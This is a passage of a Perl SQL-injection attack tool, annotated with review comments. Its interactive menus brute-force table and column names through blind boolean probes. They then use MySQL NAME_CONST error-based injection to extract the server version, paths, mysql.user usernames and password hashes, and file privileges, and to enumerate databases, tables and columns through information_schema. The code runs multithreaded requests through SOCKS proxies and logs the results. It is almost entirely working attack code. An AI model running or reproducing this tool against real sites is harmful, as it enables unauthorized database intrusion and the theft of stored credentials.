           # goto START11 when done; [3] returns to START10 (defined outside this
           # excerpt). Results are appended to z_<host3>.txt through FILE1.
  3413.    START11:
  3414.    print "    [1] Brute table\n";
  3415.    print "    [2] Brute column\n";
  3416.    print "    [3] Main menu\n";
  3417.    print "----------\n";
  3418.    $choice = <STDIN>;
  3419.    chomp $choice;
  3420.    print "Your choice: $choice\n";
  3421.    print "-------------\n";
  3422.    if ($choice == 1) {
  3423.        open( FILE1, ">>" . "z_" .$host3 . ".txt" ); # results file, append mode; the open is not checked
  3424.        print "   Brute tables\n";
  3425.        print "   -------------\n";
  3426.        print FILE1 "   Brute tables\n";
  3427.        print FILE1 "   -------------\n";
  3428.        open(FILE, "<", $source_table_list);  # unchecked; on failure @tables4 is simply left as it was
  3429.        while(<FILE>) {
  3430.          chomp;
  3431.          push(@tables4, $_);  # NOTE(review): never cleared, so re-entering this item appends the list again
  3432.        }
  3433.        close(FILE);
  3434.        print "Add prefix for brute tables ? ( for example - PHPBB_ ) (1/0): ";
  3435.        $choice = <STDIN>;
  3436.        chomp $choice;
  3437.        if ($choice == 1) {
  3438.               print "Enter your prefix for brute tables: ";
  3439.               $choice = <STDIN>;
  3440.               chomp $choice;
  3441.               $pref_brute = $choice;
  3442.        } else {
  3443.               $pref_brute = "";
  3444.        }
  3445.        $size = 0;
  3446.        $size = @tables4;  # element count (scalar context)
  3447.        print "File: $source_table_list\n";
  3448.        print "Tables: $size\n";
  3449.        print "-------------\n";
  3450.        print "Request method - $method\n";
  3451.        print "Threads - $kol_threads\n";
  3452.        print "Proxy - $proxy_message\n";
  3453.        print "----------------------\n";
  3454.        $thr = $kol_threads; # thread count from the settings block
  3455.        $num = -1; # shared work counter; the first lock/increment yields index 0
  3456.        for(0..$thr) {  # NOTE(review): 0..$thr is inclusive, so $thr+1 workers are started
  3457.             $trl[$_] = threads->create(\&gets106);
  3458.        }
  3459.        for(0..$thr) {
  3460.             $trl[$_]->join;
  3461.        }
  3462.        sub gets106 {
                    # Worker-thread body for [1]: claims the next wordlist index from the
                    # shared $num, builds one boolean probe per candidate name (the
                    # $pref_brute . name string is used verbatim) and hands it to
                    # wr_check(), defined outside this excerpt, which returns 1 when the
                    # probe matched. Matches go to STDOUT and FILE1.
                    # NOTE(review): the index is re-read after the lock is released and the
                    # loop test runs before the increment, so a thread can reach
                    # $tables4[$size] (past the end) and two threads can test the same entry.
  3463.             $| = 1;  # unbuffered STDOUT so the "\r" progress counter redraws in place
  3464.             while ($num<$size) {
  3465.                { lock($num);
  3466.                $num++; }
  3467.                $chek_len20 = 0;
  3468.                $current1 = $pref_brute . $tables4[$num];
  3469.                $bl_query = $bl_url . $bl_plus . "and" . $bl_plus . "(select" . $bl_plus . "1" . $bl_plus . "from" . $bl_plus . $current1 . $bl_plus . "limit" . $bl_plus . "0,1)=1" . $bl_filtr;  # one request per candidate, differing only in the name
  3470.                $chek_len20 = wr_check();
  3471.                if($chek_len20 == 1) {
  3472.                     print "   ---> " . $current1 . "\n";
  3473.                     print FILE1 "  "  . $current1 . "\n";
  3474.                }
  3475.                print $num . "\r";  # progress counter
  3476.                sleep $pause;  # delay between candidates
  3477.  
  3478.             }
  3479.        }
  3480.        print "----------\n";
  3481.        print "Saved in " . "z_" . $host3 . ".txt\n";
  3482.        close(FILE1);
  3483.        goto START11;
  3484.    }
  3485.    if ($choice == 2) {
  3486.          open( FILE1, ">>" . "z_" .$host3 . ".txt" ); # results file, append mode; the open is not checked
  3487.          print "   Brute columns\n";
  3488.          print "   -------------\n";
  3489.          print FILE1 "   Brute columns\n";
  3490.          print FILE1 "   -------------\n";
  3491.          print "Enter the table_name for brute: \n";
  3492.          $choice = <STDIN>;
  3493.          chomp $choice;
  3494.          $table = $choice;  # used verbatim in the probes built by gets107
  3495.          print "Brute columns for table [ " . $table . " ]\n";
  3496.          print "-------------\n";
  3497.          open(FILE, "<", $source_column_list);  # unchecked; on failure @columns4 is simply left as it was
  3498.          while(<FILE>) {
  3499.             chomp;
  3500.             push(@columns4, $_);  # NOTE(review): never cleared, so re-entering this item appends the list again
  3501.          }
  3502.          close(FILE);
  3503.        print "Add prefix for brute columns? ( for example - PHPBB_ ) (1/0): ";
  3504.        $choice = <STDIN>;
  3505.        chomp $choice;
  3506.        if ($choice == 1) {
  3507.               print "Enter your prefix for brute columns: ";
  3508.               $choice = <STDIN>;
  3509.               chomp $choice;
  3510.               $pref_brute = $choice;
  3511.        } else {
  3512.               $pref_brute = "";
  3513.        }
  3514.          $size = 0;
  3515.          $size = @columns4;  # element count (scalar context)
  3516.          print "-------------\n";
  3517.          print "File: $source_column_list\n";
  3518.          print "Columns: $size\n";
  3519.          print "-------------\n";
  3520.          print "Request method - $method\n";
  3521.          print "Threads - $kol_threads\n";
  3522.          print "Proxy - $proxy_message\n";
  3523.          print "----------------------\n";
  3524.          $thr = $kol_threads; # thread count from the settings block
  3525.        $num = -1; # shared work counter; the first lock/increment yields index 0
  3526.        for(0..$thr) {  # NOTE(review): 0..$thr is inclusive, so $thr+1 workers are started
  3527.             $trl[$_] = threads->create(\&gets107);
  3528.        }
  3529.        for(0..$thr) {
  3530.             $trl[$_]->join;
  3531.        }
  3532.        sub gets107 {
                    # Worker-thread body for [2]: same scheme as gets106, but the probe
                    # asks whether $table has a column named $pref_brute . candidate.
                    # wr_check() (outside this excerpt) returns 1 on a match.
                    # NOTE(review): same index race and past-the-end read as gets106.
  3533.             $| = 1;  # unbuffered STDOUT so the "\r" progress counter redraws in place
  3534.             while ($num<$size) {
  3535.                { lock($num);
  3536.                $num++; }
  3537.                $chek_len20 = 0;
  3538.                $current1 = $pref_brute . $columns4[$num];
  3539.                $bl_query = $bl_url . $bl_plus . "and" . $bl_plus . "(select" . $bl_plus . "mid(concat(1," . $current1 . "),1,1)" . $bl_plus . "from" . $bl_plus . $table . $bl_plus . "limit" . $bl_plus .  "0,1)=1" . $bl_filtr;  # one request per candidate, differing only in the name
  3540.                $chek_len20 = wr_check();
  3541.                if($chek_len20 == 1) {
  3542.                     print "   ---> " . $current1 . "\n";
  3543.                     print FILE1 "  "  . $current1 . "\n";
  3544.                }
  3545.                print $num . "\r";  # progress counter
  3546.                sleep $pause;  # delay between candidates
  3547.  
  3548.             }
  3549.        }
  3550.        print "----------\n";
  3551.        print "Saved in " . "z_" . $host3 . ".txt\n";
  3552.        close(FILE1);
  3553.        goto START11;
  3554.    }
  3555.    if ($choice == 3) {
  3556.        goto START10;  # blind-mode main menu label, defined outside this excerpt
  3557.    }
  3558. }
  3559. if ($choice == 12) {
          # Blind-mode menu item 12: back to the top-level START label, which is defined outside this excerpt.
  3560.   goto START;
  3561. }
  3562. }# end blind
  3563. ## mysql name_const ##
  3564. if ($choice == 11) {
  3565. if ($nc_url =~ m/^https:\/\/?([^\/]+)/i) {
  3566.    $host6 = $1;
  3567.    $https_flag = 1;
  3568.    print "----------------------\n";
  3569.    print "HTTPS mode enabled\n";
  3570.    print "----------------------\n";
  3571. }
  3572. $host = $host6;
  3573. if ($https_mode_auth == 1 && $https_auth_check == 0 && $https_flag == 1) {
  3574.     print "-----------------------------------------\n";
  3575.     print "Authorization required, wait please....";
  3576.     my $answ1 = req($host, $https_auth_script_path, 'POST', $https_auth_post_data, 0);
  3577.     $ck1 = collect($answ1);
  3578.     $https_auth_check = 1;
  3579.     print " DONE\n";
  3580.     print "-----------------------------------------\n";
  3581. }
  3582. if ($use_socks == 1 && $socks_check == 0) {
  3583.   $check_url = $host;
  3584.   our $query = "GET / HTTP/1.$http_protocol\r\n"
  3585.            . "Host: $check_host\r\n"
  3586.            . "Referer: http://" . $check_url . "\r\n"
  3587.            . "Accept: */*\r\n"
  3588.            . "User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090716 Ubuntu/9.04 (jaunty) Shiretoko/3.5.1\r\n"
  3589.            . "Connection: close\r\n\r\n";
  3590.    print "----------------------------------------\n";
  3591.    print "You choose mode with SOCKS, try to find good in $socks_file ...\n";
  3592.    print "Timeout = 5 sec:\n";
  3593.    print "----------------------------------------\n";
  3594.    $socks_check = 0;
  3595.    $check_socks = socks_check();
  3596.   ($current_proxy_host,$current_proxy_port,$socks_type) = split(/:/,$check_socks);
  3597.   $proxy_message = "$current_proxy_host:$current_proxy_port, SOCKS" . $socks_type;
  3598.   if ($current_proxy_host) {
  3599.      $socks_check = 1;
  3600.      print "Will use --> $proxy_message\n";
  3601.   } else {
  3602.      $socks_check = 0;
  3603.      $proxy_message = "No";
  3604.      print "No good SOCKS in " . $socks_file . ", change mode. Exit...\n";
  3605.   }
  3606. }
  3607. START200:
  3608. print "-----------------------------------------\n";
  3609. print "               Choose mode:\n";
  3610. print "-----------------------------------------\n";
  3611. print "    [1]  NAME_CONST - Mysql inj system information\n";
  3612. print "    [2]  NAME_CONST - get DB-names from information_schema.schemata\n";
  3613. print "    [3]  NAME_CONST - get tables from DB-name\n";
  3614. print "    [4]  NAME_CONST - get column_name from tables from DB-name\n";
  3615. print "    [5]  NAME_CONST - Mysql inj get tables from information_schema (current DB)\n";
  3616. print "    [6]  NAME_CONST - Mysql inj get column_name from table (current DB)\n";
  3617. print "    [7]  NAME_CONST - Mysql inj get data from columns\n";
  3618. print "-----------------------------------------\n";
  3619. print "    [8]  Main menu\n";
  3620. print "-----------------------------------------\n";
  3621. $choice = <STDIN>;
  3622. chomp $choice;
  3623. print "Your choice: $choice\n";
  3624. if ($choice==1) {
  3625.      open( FILE, ">>" . "z_" . $host . ".txt" ); # ???? ??? ?????? ???????????
  3626.      #### query: version() #####################################################
  3627.      $temp = $sql_pref1 . "concat(0x7665723a,version())" . $sql_pref2;
  3628.      $nc_start1 = $nc_start . $temp;
  3629.      $nc_midle1 = $nc_midle . $temp;
  3630.      $url1 = $nc_start1 . $nc_midle1 . $nc_end;
  3631.      $nc_start1 = "";
  3632.      $nc_midle1 = "";
  3633.      #### query: database() #####################################################
  3634.      $temp = $sql_pref1 . "concat(0x626173653a,database())" . $sql_pref2;
  3635.      $nc_start1 = $nc_start . $temp;
  3636.      $nc_midle1 = $nc_midle . $temp;
  3637.      $url2 = $nc_start1 . $nc_midle1 . $nc_end;
  3638.      $nc_start1 = "";
  3639.      $nc_midle1 = "";
  3640.      #### query: user() #####################################################
  3641.      $temp = $sql_pref1 . "concat(0x757365723a,user())" . $sql_pref2;
  3642.      $nc_start1 = $nc_start . $temp;
  3643.      $nc_midle1 = $nc_midle . $temp;
  3644.      $url3 = $nc_start1 . $nc_midle1 . $nc_end;
  3645.      $nc_start1 = "";
  3646.      $nc_midle1 = "";
  3647.      #### query: @@basedir #####################################################
  3648.      $temp = $sql_pref1 . "concat(0x626173656469723a," .  "@@" . "basedir)" . $sql_pref2;
  3649.      $nc_start1 = $nc_start . $temp;
  3650.      $nc_midle1 = $nc_midle . $temp;
  3651.      $url4 = $nc_start1 . $nc_midle1 . $nc_end;
  3652.      $nc_start1 = "";
  3653.      $nc_midle1 = "";
  3654.      #### query: @@datadir #####################################################
  3655.      $temp = $sql_pref1 . "concat(0x646174616469723a," .  "@@" . "datadir)" . $sql_pref2;
  3656.      $nc_start1 = $nc_start . $temp;
  3657.      $nc_midle1 = $nc_midle . $temp;
  3658.      $url5 = $nc_start1 . $nc_midle1 . $nc_end;
  3659.      $nc_start1 = "";
  3660.      $nc_midle1 = "";
  3661.      #### query: @@tmpdir #####################################################
  3662.      $temp = $sql_pref1 . "concat(0x746d706469723a," .  "@@" . "tmpdir)" . $sql_pref2;
  3663.      $nc_start1 = $nc_start . $temp;
  3664.      $nc_midle1 = $nc_midle . $temp;
  3665.      $url6 = $nc_start1 . $nc_midle1 . $nc_end;
  3666.      $nc_start1 = "";
  3667.      $nc_midle1 = "";
  3668.      #### query: @@version_compile_os #####################################################
  3669.      $temp = $sql_pref1 . "concat(0x6f733a," .  "@@" . "version_compile_os)" . $sql_pref2;
  3670.      $nc_start1 = $nc_start . $temp;
  3671.      $nc_midle1 = $nc_midle . $temp;
  3672.      $url7 = $nc_start1 . $nc_midle1 . $nc_end;
  3673.      $nc_start1 = "";
  3674.      $nc_midle1 = "";
  3675.      #### query: mysql.user (user) #####################################################
  3676.      $temp = "(select" . $nc_plus . $sql_pref1 . "concat(0x6d7973716c2e757365723a,user)" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "mysql.user)";
  3677.      $nc_start1 = $nc_start . $temp;
  3678.      $nc_midle1 = $nc_midle . $temp;
  3679.      $url8 = $nc_start1 . $nc_midle1 . $nc_end;
  3680.      $nc_start1 = "";
  3681.      $nc_midle1 = "";
  3682.      #### query: mysql.user (password) #####################################################
  3683.      $temp = "(select" . $nc_plus . $sql_pref1 . "concat(0x6d7973716c2e70617373776f72643a,password)" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "mysql.user)";
  3684.      $nc_start1 = $nc_start . $temp;
  3685.      $nc_midle1 = $nc_midle . $temp;
  3686.      $url9 = $nc_start1 . $nc_midle1 . $nc_end;
  3687.      $nc_start1 = "";
  3688.      $nc_midle1 = "";
  3689.      #### query: mysql.user (file_priv for the current user) #####################################################
  3690.      $temp = "(select" . $nc_plus . $sql_pref1 . "concat(0x66696c655f707269763a,file_priv)" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "mysql.user" . $nc_plus . "where" . $nc_plus . "user=user)";
  3691.      $nc_start1 = $nc_start . $temp;
  3692.      $nc_midle1 = $nc_midle . $temp;
  3693.      $url10 = $nc_start1 . $nc_midle1 . $nc_end;
  3694.      $nc_start1 = "";
  3695.      $nc_midle1 = "";
  3696.      #####################################################################
  3697.      $thr = $kol_threads; # ???-?? ???????
  3698.      $num = -1; # ?? ????????
  3699.      print "-----------------------------------------\n";
  3700.      print "System information:\n";
  3701.      print "-----------------------------------------\n";
  3702.      print FILE  "-----------------------------------------\n";
  3703.      print FILE  "SQL: $url1\n";
  3704.      print FILE "-----------------------------------------\n";
  3705.      print FILE "System information:\n";
  3706.      print FILE "-----------------------------------------\n";
  3707.      print "Request method - $method\n";
  3708.      print "Threads - $kol_threads\n";
  3709.      print "Proxy - $proxy_message\n";
  3710.      print "----------------------\n";
  3711.      for(0..$thr) {
  3712.         $trl[$_] = threads->create(\&gets111);
  3713.      }
  3714.      for(0..$thr) {
  3715.         $trl[$_]->join;
  3716.      }
  3717.      sub gets111 {
                # Worker-thread body for NAME_CONST mode [1]: the URLs built by the
                # enclosing block ($url1..$url10) are fetched in parallel, each thread
                # claiming the next index from the shared $num. scan_url() (outside this
                # excerpt) reads the URL from $current and returns the response body,
                # which is scanned for text delimited by the literal "ussr" markers;
                # presumably $sql_pref1/$sql_pref2 (set outside this excerpt) supply them.
                # NOTE(review): $url11 is not assigned anywhere in this excerpt, and the
                # loop test runs before the increment, so the last index claimed can be
                # $size itself; both cases pass an undefined $current to scan_url().
  3718.         @array = ($url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$url11);
  3719.         $size = @array; # element count of the URL list (scalar context)
  3720.         $| = 1;  # unbuffered STDOUT so the "\r" progress counter redraws in place
  3721.         while ($num<$size) {
  3722.             { lock($num);
  3723.             $num++; }  # claim the next index under the shared lock
  3724.             $current = $array[$num];
  3725.             $content = scan_url();
  3726.             if ($content =~ m/ussr(.*?)ussr/img) {  # only the first marker pair is reported; /g has no looping effect in a boolean test
  3727.                   print $1 . "\n";
  3728.                   print FILE $1 . "\n";  # FILE is opened by the enclosing block
  3729.             }
  3730.             print $num . "\r";  # progress counter
  3731.             sleep $pause;  # delay between requests
  3732.         }
  3733.      }
  3734.      print "----------\n";
  3735.      print "Saved in " . "z_" . $host . ".txt\n";
  3736.      close(FILE);
  3737.      goto START200;
  3738. }#end 1
  3739. # NAME_CONST mode [2]: DB names from information_schema.schemata
  3740. if ($choice == 2) {
  3741.      open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
  3742.      ## number of DBs in information_schema.schemata ##
  3743.      $temp = "(select" . $nc_plus . $sql_pref1 . "count(schema_name)" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "information_schema.schemata" . $nc_plus . "limit" . $nc_plus . "0,1)";
  3744.      $nc_start1 = $nc_start . $temp;
  3745.      $nc_midle1 = $nc_midle . $temp;
  3746.      $current = $nc_start1 . $nc_midle1 . $nc_end;
  3747.      $content = scan_url();
  3748.      $bd_num = $content;
  3749.      $bd_num =~ m/ussr(.*?)ussr/img;
  3750.      $bd_num = $1-1;
  3751.      print FILE "-----------------------------------------\n";
  3752.      print FILE "Data bases in information_schema.schemata: $bd_num\n";
  3753.      print FILE "-----------------------------------------\n";
  3754.      print "-----------------------------------------\n";
  3755.      print "Data bases in information_schema.schemata - $1\n";
  3756.      print "-----------------------------------------\n";
  3757.      $num = -1; # ?? ????????
  3758.      $thr = $kol_threads; # ???-?? ???????
  3759.      print "Request method - $method\n";
  3760.      print "Threads - $kol_threads\n";
  3761.      print "Proxy - $proxy_message\n";
  3762.      print "----------------------\n";
  3763.      for(0..$thr) {
  3764.          $trl[$_] = threads->create(\&gets5050111);
  3765.      }
  3766.      for(0..$thr) {
  3767.          $trl[$_]->join;
  3768.      }
  3769.      sub gets5050111 {
               # Worker-thread body for NAME_CONST mode [2]: fetches one schema_name
               # from information_schema.schemata per iteration, threads sharing the
               # row counter $num. The caller sets $bd_num to count-1 (visible earlier
               # in this file), so indexes 0..count-1 are covered. scan_url() (outside
               # this excerpt) reads $current and returns the body, which is scanned for
               # text between the literal "ussr" markers. $nc_start/$nc_midle/$nc_end/
               # $nc_plus/$sql_pref1/$sql_pref2 are set outside this excerpt.
               # NOTE(review): the row index is re-read from $num after the lock is
               # released, so two threads can fetch the same row while another is skipped.
  3770.        $| = 1;  # unbuffered STDOUT so the "\r" progress counter redraws in place
  3771.        while ($num<$bd_num) {
  3772.          { lock($num);
  3773.          $num++; }  # claim the next row index under the shared lock
  3774.          $temp = "(select" . $nc_plus . $sql_pref1 . "schema_name" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "information_schema.schemata" . $nc_plus . "limit" . $nc_plus . $num . ",1)";
  3775.          $nc_start1 = $nc_start . $temp;
  3776.          $nc_midle1 = $nc_midle . $temp;
  3777.          $current = $nc_start1 . $nc_midle1 . $nc_end;  # full URL handed to scan_url()
  3778.          $content = scan_url();
  3779.          if ($content =~ m/ussr(.*?)ussr/img) {  # only the first marker pair is reported
  3780.                   print $1 . "\n";
  3781.                   print FILE $1 . "\n";  # FILE is opened by the enclosing block
  3782.          }
  3783.          print $num . "\r";  # progress counter
  3784.          sleep $pause;  # delay between requests
  3785.  
  3786.        }
  3787.      }
  3788.     print "----------\n";
  3789.     print "Saved in " . "z_" . $host . ".txt\n";
  3790.     close(FILE);
  3791.     goto START200;
  3792. } # end DB
  3793. # tables from DB from schemata
# Mode 3: list table names of one database from information_schema.tables.
# The database name is read from STDIN, hex-encoded with ascii_to_hex, and
# compared against table_schema. Same threading scheme as mode 2: one
# request per row, $kol_threads+1 workers sharing the counter $num,
# results echoed to the console and appended to z_<host>.txt.
# Globals read but set outside this chunk: $host, $nc_start, $nc_midle,
# $nc_end, $nc_plus, $sql_pref1, $sql_pref2, $proxy_message, $pause,
# $method, $kol_threads, label START200.
if ($choice == 3) {
     # Hex-encode every byte of the argument and return "0x<hex>".
     # The same sub is redefined identically in modes 4, 5 and 7; the
     # prototype changes call-site parsing only, it does not validate input.
     # A character above 0xFF would yield more than two hex digits per
     # character (input here comes from STDIN undecoded, so bytes are expected).
     sub ascii_to_hex ($) {
            (my $str = shift) =~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;
            $str = "0x" . $str;
            return $str;
     }
     # Output file: 2-arg open on a bareword handle, append mode, return value not checked.
     open( FILE, ">>" . "z_" .$host . ".txt" );
     print "-----------------------------------------\n";
     print "Enter the DB-name: ";
     $choice = <STDIN>; # $choice is reused: menu number before, DB name from here on
     chomp $choice;
     if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"} # backtick-quote names containing '-'
     print "DB-name: $choice\n";
     print "----------\n";
     $choice1 = ascii_to_hex $choice; # hex literal used in the table_schema comparison
     ## Number of tables in information_schema.tables for this schema ##
     $temp = "(select" . $nc_plus . $sql_pref1 . "count(table_name)" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "information_schema.tables"  . $nc_plus . "where" . $nc_plus . "table_schema=" . $choice1 . $nc_plus . "limit" . $nc_plus . "0,1)";
     $nc_start1 = $nc_start . $temp;
     $nc_midle1 = $nc_midle . $temp;
     $current = $nc_start1 . $nc_midle1 . $nc_end; # scan_url() (defined elsewhere) works on $current
     $content = scan_url();
     $bd_num = $content;
     # Value expected between literal "ussr" markers; if absent, $1 is stale.
     $bd_num =~ m/ussr(.*?)ussr/img;
     $bd_num = $1; # raw count (mode 2 subtracts 1 here), so the loop's last offset equals the count
     print FILE "-----------------------------------------\n";
     print FILE "Tables in $choice: $bd_num\n";
     print FILE "-----------------------------------------\n";
     print "-----------------------------------------\n";
     print "Tables in $choice: $bd_num\n";
     print "-----------------------------------------\n";
     $num = -1; # shared row counter; each worker increments it before use
     $thr = $kol_threads; # 0..$thr below is inclusive, so $kol_threads+1 workers are started
     print "Request method - $method\n";
     print "Threads - $kol_threads\n";
     print "Proxy - $proxy_message\n";
     print "----------------------\n";
     for(0..$thr) {
         $trl[$_] = threads->create(\&gets5050222);
     }
     for(0..$thr) {
         $trl[$_]->join;
     }
     # Worker: claim the next offset, fetch one table_name, print it.
     # Named subs are compiled before runtime, so this placement is fine.
     sub gets5050222 {
       $| = 1; # autoflush so the "\r" progress line is visible
       while ($num<$bd_num) {
         { lock($num);
         $num++; }
         # $num is read below outside the lock: interleaving workers can
         # request the same offset.
         $temp = "(select" . $nc_plus . $sql_pref1 . "table_name" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "information_schema.tables"  . $nc_plus . "where" . $nc_plus . "table_schema=" . $choice1 . $nc_plus . "limit" . $nc_plus . $num . ",1)";
          $nc_start1 = $nc_start . $temp;
         $nc_midle1 = $nc_midle . $temp;
         $current = $nc_start1 . $nc_midle1 . $nc_end;
         $content = scan_url();
         if ($content =~ m/ussr(.*?)ussr/img) {
                  print $1 . "\n";
                  print FILE $1 . "\n"; # several threads write one handle; lines may interleave
         }
         print $num . "\r"; # progress indicator
         sleep $pause; # $pause is set outside this chunk

       }
     }
    print "----------\n";
    print "Saved in " . "z_" . $host . ".txt\n";
    close(FILE); # return value not checked
    goto START200; # label defined outside this chunk
} # end tables from DB
  3860. # columns tables from tables from DB
# Mode 4: list column names of one table from information_schema.columns.
# Database and table names are read from STDIN, hex-encoded, and matched
# against table_schema and table_name. Same threading scheme as modes 2/3:
# one request per row, $kol_threads+1 workers sharing $num, results echoed
# to the console and appended to z_<host>.txt.
# Globals read but set outside this chunk: $host, $nc_start, $nc_midle,
# $nc_end, $nc_plus, $sql_pref1, $sql_pref2, $proxy_message, $pause,
# $method, $kol_threads, label START200.
if ($choice == 4) {
     # Hex-encode every byte of the argument and return "0x<hex>".
     # Identical redefinition of the sub in modes 3, 5 and 7.
     sub ascii_to_hex ($) {
            (my $str = shift) =~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;
            $str = "0x" . $str;
            return $str;
     }
     # Output file: 2-arg open on a bareword handle, append mode, return value not checked.
     open( FILE, ">>" . "z_" .$host . ".txt" );
     print "-----------------------------------------\n";
     print "Enter the DB-name: ";
     $choice = <STDIN>; # $choice is reused: menu number before, DB name from here on
     chomp $choice;
     if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"} # backtick-quote names containing '-'
     $choice1 = ascii_to_hex $choice; # computed again three lines down; the second assignment is redundant
     print "DB-name: $choice\n";
     print "----------\n";
     $choice1 = ascii_to_hex $choice;
     print "-----------------------------------------\n";
     print "Enter the TABLE-name: ";
     $choice2 = <STDIN>;
     chomp $choice2;
     if ($choice2 =~ m/-/imgs) {$choice2 = "`" . $choice2 . "`"}
       $choice3 = ascii_to_hex $choice2; # hex literal used in the table_name comparison
     print "TABLE-name: $choice2\n";
     print "----------\n";
     ## Number of columns for this schema+table ##
     $temp = "(select" . $nc_plus . $sql_pref1 . "count(column_name)" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "information_schema.columns"  . $nc_plus  . "where" . $nc_plus . "table_name=" . $choice3 . $nc_plus . "and" . $nc_plus . "table_schema=" . $choice1 . $nc_plus . "limit" . $nc_plus . "0,1)";
     $nc_start1 = $nc_start . $temp;
     $nc_midle1 = $nc_midle . $temp;
     $current = $nc_start1 . $nc_midle1 . $nc_end; # scan_url() (defined elsewhere) works on $current
       $content = scan_url();
     $bd_num = $content;
     # Value expected between literal "ussr" markers; if absent, $1 is stale.
     $bd_num =~ m/ussr(.*?)ussr/img;
     $bd_num = $1; # raw count, as in mode 3
     print FILE "-----------------------------------------\n";
     print FILE "Columns in [$choice.$choice2]: $bd_num\n";
     print FILE "-----------------------------------------\n";
     print "-----------------------------------------\n";
     print "Columns in [$choice.$choice2]: $bd_num\n";
     print "-----------------------------------------\n";
     $num = -1; # shared row counter; each worker increments it before use
     $thr = $kol_threads; # 0..$thr below is inclusive, so $kol_threads+1 workers are started
     print "Request method - $method\n";
     print "Threads - $kol_threads\n";
     print "Proxy - $proxy_message\n";
     print "----------------------\n";
     for(0..$thr) {
         $trl[$_] = threads->create(\&gets5050333);
     }
     for(0..$thr) {
         $trl[$_]->join;
     }
     # Worker: claim the next offset, fetch one column_name, print it.
     # Named subs are compiled before runtime, so this placement is fine.
     sub gets5050333 {
       $| = 1; # autoflush so the "\r" progress line is visible
       while ($num<$bd_num) {
         { lock($num);
         $num++; }
         # $num is read below outside the lock: interleaving workers can
         # request the same offset.
         $temp = "(select" . $nc_plus . $sql_pref1 . "column_name" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "information_schema.columns"  . $nc_plus  . "where" . $nc_plus . "table_name=" . $choice3 . $nc_plus . "and" . $nc_plus . "table_schema=" . $choice1 . $nc_plus . "limit" . $nc_plus . $num . ",1)";
          $nc_start1 = $nc_start . $temp;
         $nc_midle1 = $nc_midle . $temp;
         $current = $nc_start1 . $nc_midle1 . $nc_end;
         $content = scan_url();
         if ($content =~ m/ussr(.*?)ussr/img) {
                  print $1 . "\n";
                  print FILE $1 . "\n"; # several threads write one handle; lines may interleave
         }
         print $num . "\r"; # progress indicator
         sleep $pause; # $pause is set outside this chunk

       }
     }
    print "----------\n";
    print "Saved in " . "z_" . $host . ".txt\n";
    close(FILE); # return value not checked
    goto START200; # label defined outside this chunk
} # end columns tables from tables from DB
# Mode 5: list table names from information_schema.tables, either all of
# them or only the rows between a START and END position entered on STDIN
# (1-based; converted to zero-based offsets below). Same threading scheme
# as modes 2-4: one request per row, $kol_threads+1 workers sharing $num,
# results echoed to the console and appended to z_<host>.txt.
# Globals read but set outside this chunk: $host, $nc_start, $nc_midle,
# $nc_end, $nc_plus, $sql_pref1, $sql_pref2, $proxy_message, $pause,
# $method, $kol_threads, label START200.
if ($choice==5) {
     # Hex-encode every byte of the argument and return "0x<hex>".
     # Identical redefinition of the sub in modes 3, 4 and 7; not called in this mode.
     sub ascii_to_hex ($) {
            (my $str = shift) =~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;
            $str = "0x" . $str;
            return $str;
     }
     # Output file: 2-arg open on a bareword handle, append mode, return value not checked.
     open( FILE, ">>" . "z_" .$host . ".txt" );
     ## Number of rows in information_schema.tables ##
     $temp = "(select" . $nc_plus . $sql_pref1 . "count(table_name)" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "information_schema.tables" . $nc_plus . "limit" . $nc_plus . "0,1)";
     $nc_start1 = $nc_start . $temp;
     $nc_midle1 = $nc_midle . $temp;
     $url11 = $nc_start1 . $nc_midle1 . $nc_end; # $url11 is only a stepping stone to $current
     $current = $url11; # scan_url() (defined elsewhere) works on $current
     $content = scan_url();
     $tab_num = $content;
     # Value expected between literal "ussr" markers; if absent, $1 is stale.
     $tab_num =~ m/ussr(.*?)ussr/img;
     $tab_num = $1-1; # highest zero-based offset when all rows are requested
     print "-----------------------------------------\n";
     print "Tables in information_schema.tables - $1\n"; # raw count
     print "-----------------------------------------\n";
     ## Optional range selection ##
     print "Get ALL tables from information_schema ($1) ? (1/0): ";
     $choice = <STDIN>; # $choice is reused: menu number before, answer from here on
     chomp $choice;
     $thr = $kol_threads; # 0..$thr below is inclusive, so $kol_threads+1 workers are started
     if ($choice == 1) {
          $num = -1; # shared row counter; first requested offset is 0
     } else {
          print "Enter START_position: ";
          $choice1 = <STDIN>;
          chomp $choice1;
          $num = $choice1-2; # first requested offset is START-1 (zero-based)
          print "Enter END_position: ";
          $choice2 = <STDIN>;
          chomp $choice2;
          $tab_num = $choice2-1; # last requested offset is END-1 (zero-based)
          print "Dump records from [" . ($num+2) . "] to [" . ($tab_num+1) . "]\n";
     }
     print "-----------------------------------------\n";
     ## end of range selection
     print FILE  "-----------------------------------------\n";
     print FILE  "Tables in information_schema.tables - $1\n"; # still the count match above; no regex ran since
     print FILE  "-----------------------------------------\n";
     print "Request method - $method\n";
     print "Threads - $kol_threads\n";
     print "Proxy - $proxy_message\n";
     print "----------------------\n";
     for(0..$thr) {
         $trl[$_] = threads->create(\&gets112);
     }
     for(0..$thr) {
         $trl[$_]->join;
     }
     # Worker: claim the next offset, fetch one table_name, print it.
     # Named subs are compiled before runtime, so this placement is fine.
     sub gets112 {
       $| = 1; # autoflush so the "\r" progress line is visible
       while ($num<$tab_num) {
         { lock($num);
         $num++; }
         # $num is read below outside the lock: interleaving workers can
         # request the same offset.
